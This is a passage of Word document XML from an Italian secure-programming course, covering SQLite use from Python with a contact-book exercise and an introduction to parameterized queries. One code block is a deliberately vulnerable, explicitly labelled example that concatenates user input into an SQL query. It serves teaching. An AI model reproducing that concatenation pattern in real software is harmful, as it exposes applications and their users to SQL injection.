      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Anteprima del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Le query SQL sono il punto in cui si annida la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, la classe di vulnerabilità più antica e ancora oggi più comune. Il problema nasce dalla</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">costruzione delle query con i dati dell’utente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: se concateno l’input ricevuto dal browser direttamente dentro la stringa SQL, do all’utente la possibilità di iniettare istruzioni arbitrarie. Esempio sbagliato (lo affronteremo per esteso nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># SBAGLIATO — vulnerabile a SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT * FROM utenti WHERE username = '"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> input_utente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"'"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per ora limitati a sapere che esiste il problema. Vedremo come prevenirlo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="128"/>
    <w:bookmarkStart w:id="131" w:name="python-parla-con-sqlite"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="478" w:name="sec_3_11"/>
      <w:r>
        <w:t xml:space="preserve">3.11 Python parla con SQLite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="478"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python ha nella libreria standard il modulo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sqlite3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che permette di usare SQLite senza installare nulla di aggiuntivo. Il pattern è sempre lo stesso, in qualunque linguaggio si lavori:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Connettiti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">al database (passandogli il file)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crea un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cursore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(un oggetto che esegue query e ne legge i risultati)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esegui</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la query</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Leggi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">i risultati (per le SELECT) o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">conferma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">le modifiche (per INSERT/UPDATE/DELETE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Chiudi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la connessione</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="129" w:name="X1fc78a705c8c83eefaf186845dc08ad5164bd8c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esercizio pratico: il tuo primo programma con database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri VS Code, vai nella cartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, attiva l’ambiente virtuale (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(venv)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deve comparire nel terminale) e crea un file chiamato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">primo_db.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sqlite3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 1. CONNETTI (crea il file 'rubrica.db' se non esiste)</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"rubrica.db"</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 2. CREA UNA TABELLA (solo la prima volta che lanci lo script)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    CREATE TABLE IF NOT EXISTS contatti (</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        id INTEGER PRIMARY KEY AUTOINCREMENT,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        nome TEXT NOT NULL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        telefono TEXT</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 3. INSERISCI ALCUNI DATI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"INSERT INTO contatti (nome, telefono) VALUES (?, ?)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Mario Rossi"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"333-1234567"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"INSERT INTO contatti (nome, telefono) VALUES (?, ?)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Giulia Bianchi"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"335-7654321"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 4. CONFERMA LE MODIFICHE (importante per INSERT/UPDATE/DELETE)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">conn.commit()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 5. LEGGI I DATI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT id, nome, telefono FROM contatti"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">righe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cur.fetchall()  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># restituisce una lista di tuple</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Contenuto della rubrica:"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> riga </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> righe:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"  ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">riga[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</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riga[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</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riga[</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6. CHIUDI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Salva ed esegui:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python primo_db.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vedrai stampato:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Contenuto della rubrica:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ID 1: Mario Rossi — 333-1234567</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ID 2: Giulia Bianchi — 335-7654321</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esegui lo script una seconda volta. Risultato:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Contenuto della rubrica:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ID 1: Mario Rossi — 333-1234567</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ID 2: Giulia Bianchi — 335-7654321</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ID 3: Mario Rossi — 333-1234567</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ID 4: Giulia Bianchi — 335-7654321</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vedi?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Le righe sono raddoppiate.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il database ha</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">salvato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">i dati della prima esecuzione (è quello che fanno i database:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">persistono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Alla seconda esecuzione hai inserito altri due contatti uguali. Hai appena verificato che il database mantiene lo stato fra esecuzioni.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri il file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rubrica.db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con DB Browser for SQLite (che hai installato nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_0" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">): vedrai la tua tabella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">contatti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con tutte le righe inserite. Sentiti libero di esplorare.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="129"/>
    <w:bookmarkStart w:id="130" w:name="Xf4158f0a79d2d1f8821a66bd8f4156e80a53d10"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quei</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nella query: anteprima delle query parametriche</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hai notato che nella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non ho concatenato direttamente la stringa? Ho scritto:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"INSERT INTO contatti (nome, telefono) VALUES (?, ?)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Mario Rossi"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"333-1234567"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">placeholder</w:t>
      </w:r>
      <w:r>
